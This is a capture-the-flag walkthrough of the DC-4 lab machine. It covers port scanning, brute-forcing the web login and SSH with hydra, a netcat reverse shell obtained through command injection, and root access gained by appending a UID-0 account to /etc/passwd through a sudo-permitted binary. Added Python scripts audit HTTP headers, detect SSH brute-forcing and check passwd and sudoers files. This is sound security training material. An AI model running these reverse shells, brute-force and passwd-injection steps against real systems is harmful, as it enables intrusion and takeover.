DC-4 Target Machine Penetration Walkthrough (Very Detailed)

Target machine page

Information gathering

Find DC4's IP address

DC4's MAC address is 00:0C:29:90:C6:B0. Scanning for live hosts with nmap shows that the IP corresponding to this MAC address is 192.168.175.158.

The target's web page

Scan DC4's open ports

┌──(kali💋kali)-[~]
└─$ sudo nmap -Pn -A -p- -sS -sC -T4 192.168.175.158
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2023-04-05 23:30 EDT
Nmap scan report for 192.168.175.158
Host is up (0.00076s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 00:0C:29:90:C6:B0 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.76 ms 192.168.175.158

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.03 seconds

Port  State  Service  Version
22    open   ssh      OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80    open   http     nginx 1.15.10

Web application fingerprint information

Nikto report

┌──(kali💋kali)-[~]
└─$ nikto -host http://192.168.175.158
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.175.158
+ Target Hostname:    192.168.175.158
+ Target Port:        80
+ Start Time:         2023-04-05 23:23:30 (GMT-4)
---------------------------------------------------------------------------
+ Server: nginx/1.15.10
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Cookie PHPSESSID created without the httponly flag
+ 7915 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2023-04-05 23:23:58 (GMT-4) (28 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
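The Nikto findings above (no X-Frame-Options, no X-Content-Type-Options, a PHPSESSID cookie issued without HttpOnly, and a Server header that reveals the exact nginx version) are the kind of thing a defender can verify automatically after every config change. The following Python script is an added example and is not code from the original post: it parses a raw HTTP response head and reports exactly those gaps. The two responses it checks are constructed samples modelled on the Nikto output, not captures from the DC-4 machine.

```python
"""Audit an HTTP response head for the hardening gaps Nikto reported.

Added example, not code from the original post. SAMPLE_RESPONSE and
HARDENED_RESPONSE are constructed samples modelled on the Nikto findings.
"""
from __future__ import annotations

import re

# Headers a defender expects on an authenticated web app, and why.
# (Nikto also flags X-XSS-Protection; modern browsers ignore it, so a
# Content-Security-Policy is checked instead.)
REQUIRED_HEADERS = {
    "x-frame-options": "clickjacking protection missing",
    "x-content-type-options": "MIME-sniffing protection missing",
    "content-security-policy": "no Content-Security-Policy",
}

VERSION_RE = re.compile(r"/\d+(\.\d+)+")  # e.g. nginx/1.15.10


def parse_headers(raw: str) -> list[tuple[str, str]]:
    """Split a raw response head into (name, value) pairs.

    Names are lower-cased; duplicates (e.g. several Set-Cookie) are kept.
    Parsing stops at the blank line that ends the head.
    """
    lines = raw.lstrip().splitlines()
    headers = []
    for line in lines[1:]:  # lines[0] is the status line
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return headers


def cookie_attributes(value: str) -> set[str]:
    """Return the lower-cased attribute names of a Set-Cookie value."""
    return {part.strip().split("=", 1)[0].lower() for part in value.split(";")[1:]}


def audit_response(raw: str) -> list[str]:
    """Return a list of findings; an empty list means nothing to report."""
    headers = parse_headers(raw)
    present = {name for name, _ in headers}
    findings = []
    for header, why in REQUIRED_HEADERS.items():
        if header not in present:
            findings.append(f"missing {header}: {why}")
    for name, value in headers:
        if name == "server" and VERSION_RE.search(value):
            findings.append(f"server header discloses version: {value}")
        if name == "set-cookie":
            cookie = value.split("=", 1)[0]
            attrs = cookie_attributes(value)
            if "httponly" not in attrs:
                findings.append(f"cookie {cookie} set without HttpOnly")
            if "secure" not in attrs:
                findings.append(f"cookie {cookie} set without Secure")
    return findings


# Constructed sample: what the login page's response head looks like
# according to the Nikto report (everything except the headers is made up).
SAMPLE_RESPONSE = """HTTP/1.1 200 OK
Server: nginx/1.15.10
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=constructedsessionid; path=/

<html>...</html>
"""

# Constructed sample: the same response after hardening nginx and PHP.
HARDENED_RESPONSE = """HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self'
Set-Cookie: PHPSESSID=constructedsessionid; path=/; HttpOnly; Secure; SameSite=Lax

<html>...</html>
"""

if __name__ == "__main__":
    for label, raw in (("before", SAMPLE_RESPONSE), ("after", HARDENED_RESPONSE)):
        print(f"[{label}] {len(audit_response(raw))} finding(s)")
        for finding in audit_response(raw):
            print("  -", finding)
```

The unhardened sample yields six findings and the hardened one none. On nginx the header lines are `add_header` directives plus `server_tokens off;` for the version leak; the cookie flags come from PHP's `session.cookie_httponly` and `session.cookie_secure` settings.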

 

Penetration process

Brute-forcing the login form username and password

Capture the login request with Burp Suite, pick a good password dictionary, and brute-force the password.

Username admin, password happy; log in.

Remote command execution

After logging in, we find that commands can be executed, for example listing files.

Can we run commands of our own choosing? Capture the request with Burp Suite and see whether it can be changed to run a different command, such as whoami; it executes successfully.

Next we can use this remote command execution to get a reverse shell.

nc -e /bin/bash 192.168.175.144 1444

 

Listen on port 1444 on Kali; the reverse shell connects back successfully.

Enter an interactive shell:

python3 -c "import pty;pty.spawn('/bin/bash')"

SSH login

Change to the home directory and find three users: charles, jim, and sam.

charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash 

Nothing of interest in the charles and sam directories, but jim's directory has something.

Then enter the backups directory and find the file old-passwords.bak. Opening it, it looks like a password dictionary, so jim's SSH password is probably in here.

So use this password list to brute-force SSH.

First save these passwords into a new local file; there are 252 passwords in total.

Next, brute-force the password with hydra:

hydra ssh://192.168.175.158 -l jim -P jim.dic -vV -f -t 64

Username jim, password jibril04.

SSH login
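On the defender's side, the hydra run above leaves a very recognisable trace in the SSH server's auth log: a burst of "Failed password" lines from one source address and, because -f stops at the first hit, an "Accepted password" for the same account right after. The following Python detector is an added example, not code from the original post; the log lines it runs over are constructed in the style of Debian's /var/log/auth.log and are not from the DC-4 machine.

```python
"""Detect SSH password brute forcing in auth.log-style lines.

Added example, not code from the original post. SAMPLE_LOG is a constructed
auth.log excerpt in Debian sshd format, not output from the DC-4 machine.
"""
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime

# Matches the two sshd lines that matter: a failed and an accepted password.
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)


def parse_line(line: str, year: int = 2023) -> tuple[datetime, str, str, str] | None:
    """Return (timestamp, result, user, ip) or None for lines we do not care about.

    Syslog timestamps carry no year, so the caller supplies one.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(lines, threshold: int = 10, window_seconds: int = 60) -> list[dict]:
    """Alert on any source IP with >= threshold failures inside one window.

    Each alert records the total failures seen from that IP and, if a login
    later succeeded from it, the account that was logged into: that is the
    case to escalate first, because the password guessing worked.
    """
    events = sorted(e for e in map(parse_line, lines) if e is not None)
    by_ip = defaultdict(list)
    for ts, result, user, ip in events:
        by_ip[ip].append((ts, result, user))

    alerts = []
    for ip, evs in by_ip.items():
        failures = [ts for ts, result, _ in evs if result == "Failed"]
        burst = False
        start = 0  # left edge of the sliding window over failure timestamps
        for i, ts in enumerate(failures):
            while (ts - failures[start]).total_seconds() > window_seconds:
                start += 1
            if i - start + 1 >= threshold:
                burst = True
                break
        if burst:
            success = next((user for _, result, user in evs if result == "Accepted"), None)
            alerts.append({"ip": ip, "failures": len(failures), "success_as": success})
    return alerts


# Constructed sample: twelve guesses in twelve seconds against 'jim' from one
# host, then a successful login, plus one unrelated failure from another host
# and a pam_unix line the parser should ignore.
SAMPLE_LOG = [
    f"Apr  5 23:40:{i:02d} dc-4 sshd[{1000 + i}]: Failed password for jim "
    f"from 192.168.175.144 port {40000 + i} ssh2"
    for i in range(12)
] + [
    "Apr  5 23:40:13 dc-4 sshd[1012]: Accepted password for jim from 192.168.175.144 port 40012 ssh2",
    "Apr  5 23:41:07 dc-4 sshd[1020]: Failed password for invalid user admin from 10.0.0.5 port 51000 ssh2",
    "Apr  5 23:41:08 dc-4 sshd[1021]: pam_unix(sshd:session): session opened for user jim by (uid=0)",
]

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The sample produces one alert: 12 failures from 192.168.175.144 followed by a successful login as jim. The same threshold-per-window logic is what fail2ban's sshd jail applies when it bans a source; the extra "success_as" field is what turns a noisy brute-force alert into a confirmed account compromise worth an immediate password reset.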

Privilege escalation

Look at the mbox file; it suggests there is a mail server.

Another email is found: change to /var/mail and view the jim file.

charles sent his password to jim; charles's password is ^xHhA&hvim0y

Next, log in over SSH as charles.

Check sudo permissions:

sudo -l

/usr/bin/teehee can be run as root without a password.

teehee privilege escalation:

The teehee command can write to files, which we can use to escalate privileges.

Use teehee -a to append an account to /etc/passwd that has root privileges, then switch to that user.

passwd format: [username]:[password]:[UID]:[GID]:[description]:[home directory]:[login shell]

Append a user to /etc/passwd:

echo "tacoking::0:0:::/bin/bash" | sudo teehee -a /etc/passwd       # privilege escalation: append the user

charles@dc-4:~$ su tacoking
root@dc-4:/home/charles# id
uid=0(root) gid=0(root) groups=0(root) 
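This escalation rests on two configuration facts a defender can check mechanically: a sudoers rule that grants passwordless root for a binary that writes arbitrary files, and /etc/passwd accepting an entry with UID 0 and an empty password field. The following Python audit is an added example, not code from the original post; it parses /etc/passwd in exactly the seven-field layout given above and scans sudoers-style lines for NOPASSWD rules. Both inputs are constructed samples built from the entries shown in the post; the sudoers line is a reconstruction of what sudo -l reported, not the machine's real file.

```python
"""Audit /etc/passwd entries and sudoers rules for the weaknesses used above.

Added example, not code from the original post. SAMPLE_PASSWD and
SAMPLE_SUDOERS are constructed from the entries shown in the post; the
sudoers line is a reconstruction, not the DC-4 machine's real file.
"""
from __future__ import annotations

from typing import NamedTuple


class PasswdEntry(NamedTuple):
    # Field order is the one given in the post:
    # name:password:UID:GID:description:home:shell
    name: str
    password: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> tuple[list[PasswdEntry], list[str]]:
    """Parse passwd lines; malformed lines become findings instead of entries."""
    entries, findings = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"line {lineno}: malformed entry with {len(fields)} fields")
            continue
        try:
            entries.append(PasswdEntry(fields[0], fields[1], int(fields[2]), int(fields[3]), *fields[4:]))
        except ValueError:
            findings.append(f"line {lineno}: non-numeric UID or GID")
    return entries, findings


def audit_passwd(text: str) -> list[str]:
    """Flag entries that grant root or bypass password checks."""
    entries, findings = parse_passwd(text)
    seen = set()
    for e in entries:
        if e.uid == 0 and e.name != "root":
            findings.append(f"{e.name}: UID 0 account that is not root")
        if e.password == "":
            findings.append(f"{e.name}: empty password field, no password needed to log in")
        elif e.password != "x" and not e.password.startswith(("!", "*")):
            findings.append(f"{e.name}: password hash kept in /etc/passwd instead of /etc/shadow")
        if e.name in seen:
            findings.append(f"{e.name}: duplicate account name")
        seen.add(e.name)
    return findings


def audit_sudoers(text: str) -> list[str]:
    """List every NOPASSWD rule; each one needs a review of the command it allows."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "NOPASSWD:" not in line:
            continue
        who = line.split()[0]
        commands = line.split("NOPASSWD:", 1)[1].strip()
        findings.append(f"{who}: passwordless sudo for {commands}")
    return findings


# Constructed sample: the three home-directory users from the post, root,
# and the entry appended with teehee (empty password field, UID 0).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash
tacoking::0:0:::/bin/bash
"""

# Constructed sudoers fragment reconstructing what `sudo -l` showed for charles.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
root    ALL=(ALL:ALL) ALL
charles ALL=(root) NOPASSWD: /usr/bin/teehee
"""

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD) + audit_sudoers(SAMPLE_SUDOERS):
        print("-", finding)
```

On a real host, feed it the contents of /etc/passwd and of /etc/sudoers plus /etc/sudoers.d/*. The passwd checks also make a good file-integrity rule: a legitimate account creation never writes a UID 0 entry with an empty password field, so an alert on that condition has essentially no false positives.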

View the flag

root@dc-4:/home/charles# cd /root
root@dc-4:/root# ls
flag.txt
root@dc-4:/root# cat flag.txt

888       888          888 888      8888888b.                             888 888 888 888
888   o   888          888 888      888  "Y88b                            888 888 888 888
888  d8b  888          888 888      888    888                            888 888 888 888
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

Author: tacokings